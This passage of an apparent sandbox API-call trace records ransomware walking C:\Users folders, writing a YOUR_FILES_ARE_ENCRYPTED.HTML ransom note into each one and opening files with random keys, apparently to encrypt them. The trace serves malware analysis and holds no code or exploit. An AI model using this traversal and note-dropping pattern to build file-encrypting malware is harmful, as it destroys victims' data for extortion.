ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 0 [0110.799] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.799] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 57 [0110.799] GetProcessHeap () returned 0x600000 [0110.799] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.800] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.801] CloseHandle (hObject=0x314) returned 1 [0110.801] GetProcessHeap () returned 0x600000 [0110.801] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.801] GetProcessHeap () returned 0x600000 [0110.801] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.802] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Videos", cAlternateFileName="")) returned 0 [0110.802] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.802] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 50 [0110.802] GetProcessHeap () returned 0x600000 [0110.802] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3173dd8 [0110.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0110.803] WriteFile (in: hFile=0x300, lpBuffer=0x3173dd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x3173dd8*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.803] CloseHandle (hObject=0x300) returned 1 [0110.804] GetProcessHeap () returned 0x600000 [0110.804] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.804] GetProcessHeap () returned 0x600000 [0110.804] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.804] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x4f6643a1, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x4f6643a1, ftLastAccessTime.dwHighDateTime=0x1d112ea, ftLastWriteTime.dwLowDateTime=0x4f6643a1, ftLastWriteTime.dwHighDateTime=0x1d112ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0110.804] StrStrIW (lpFirst="Default User", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.805] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default User") returned 25 [0110.805] GetProcessHeap () returned 0x600000 [0110.805] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.806] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\Default User" | out: lpString1="\\\\?\\C:\\Users\\Default User") returned="\\\\?\\C:\\Users\\Default User" [0110.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default User", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default User\\*") returned="\\\\?\\C:\\Users\\Default User\\*" [0110.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Videos", cAlternateFileName="翿")) returned 0xffffffff [0110.806] GetProcessHeap () returned 0x600000 [0110.806] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.806] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3757c8c, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x973af366, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.806] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.806] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0110.806] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.806] lstrlenW (lpString=".ini") returned 4 [0110.806] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.806] SystemFunction036 (in: RandomBuffer=0x19f3e4, RandomBufferLength=0x20 | out: RandomBuffer=0x19f3e4) returned 1 [0110.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x300 [0110.806] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x19f408 | out: lpFileSize=0x19f408*=174) returned 1 [0110.806] CloseHandle (hObject=0x300) returned 1 [0110.806] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Public", cAlternateFileName="")) returned 1 [0110.807] StrStrIW (lpFirst="Public", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.807] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public") returned 19 [0110.807] GetProcessHeap () returned 0x600000 [0110.807] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.807] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\Public" | out: lpString1="\\\\?\\C:\\Users\\Public") returned="\\\\?\\C:\\Users\\Public" [0110.807] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*") returned="\\\\?\\C:\\Users\\Public\\*" [0110.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.807] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0110.807] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1 [0110.807] StrStrIW (lpFirst="AccountPictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.807] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\AccountPictures") returned 35 [0110.807] GetProcessHeap () returned 0x600000 [0110.807] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.808] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Public\\AccountPictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\AccountPictures") returned="\\\\?\\C:\\Users\\Public\\AccountPictures" [0110.808] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\AccountPictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\AccountPictures\\*") returned="\\\\?\\C:\\Users\\Public\\AccountPictures\\*" [0110.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620960, dwReserved1=0x620938, cFileName=".", cAlternateFileName="")) returned 0x626838 [0110.808] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620960, dwReserved1=0x620938, cFileName="..", cAlternateFileName="")) returned 1 [0110.808] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x620960, dwReserved1=0x620938, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.808] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.808] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 47 [0110.808] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.808] lstrlenW (lpString=".ini") returned 4 [0110.808] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.808] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0110.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\AccountPictures\\desktop.ini" (normalized: "c:\\users\\public\\accountpictures\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0110.808] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=196) returned 1 [0110.808] CloseHandle (hObject=0x304) returned 1 [0110.808] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x620960, dwReserved1=0x620938, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0110.809] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0110.809] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\AccountPictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0110.809] GetProcessHeap () returned 0x600000 [0110.809] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\AccountPictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\accountpictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.809] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.810] CloseHandle (hObject=0x314) returned 1 [0110.811] GetProcessHeap () returned 0x600000 [0110.811] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.811] GetProcessHeap () returned 0x600000 [0110.811] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.811] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="Desktop", cAlternateFileName="")) returned 1 [0110.811] StrStrIW (lpFirst="Desktop", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.811] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop") returned 27 [0110.811] GetProcessHeap () returned 0x600000 [0110.811] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.812] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Public\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop") returned="\\\\?\\C:\\Users\\Public\\Desktop" [0110.812] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\*") returned="\\\\?\\C:\\Users\\Public\\Desktop\\*" [0110.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620960, dwReserved1=0x620938, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.812] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620960, dwReserved1=0x620938, cFileName="..", cAlternateFileName="")) returned 1 [0110.812] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x620960, dwReserved1=0x620938, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.812] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.812] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0110.812] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.812] lstrlenW (lpString=".ini") returned 4 [0110.812] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.812] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0110.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0110.813] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=174) returned 1 [0110.813] CloseHandle (hObject=0x304) returned 1 [0110.813] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x620960, dwReserved1=0x620938, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0110.813] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.813] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 57 [0110.813] GetProcessHeap () returned 0x600000 [0110.813] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.816] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.817] CloseHandle (hObject=0x314) returned 1 [0110.818] GetProcessHeap () returned 0x600000 [0110.818] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.818] GetProcessHeap () returned 0x600000 [0110.818] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.818] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.818] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.819] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0110.819] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.819] lstrlenW (lpString=".ini") returned 4 [0110.819] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.819] SystemFunction036 (in: RandomBuffer=0x19f0d0, RandomBufferLength=0x20 | out: RandomBuffer=0x19f0d0) returned 1 [0110.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0110.819] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19f0f4 | out: lpFileSize=0x19f0f4*=174) returned 1 [0110.819] CloseHandle (hObject=0x314) returned 1 [0110.819] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0110.819] StrStrIW (lpFirst="Documents", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.819] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents") returned 29 [0110.819] GetProcessHeap () returned 0x600000 [0110.819] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.820] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Public\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents") returned="\\\\?\\C:\\Users\\Public\\Documents" [0110.820] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\*" [0110.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.821] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.821] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, 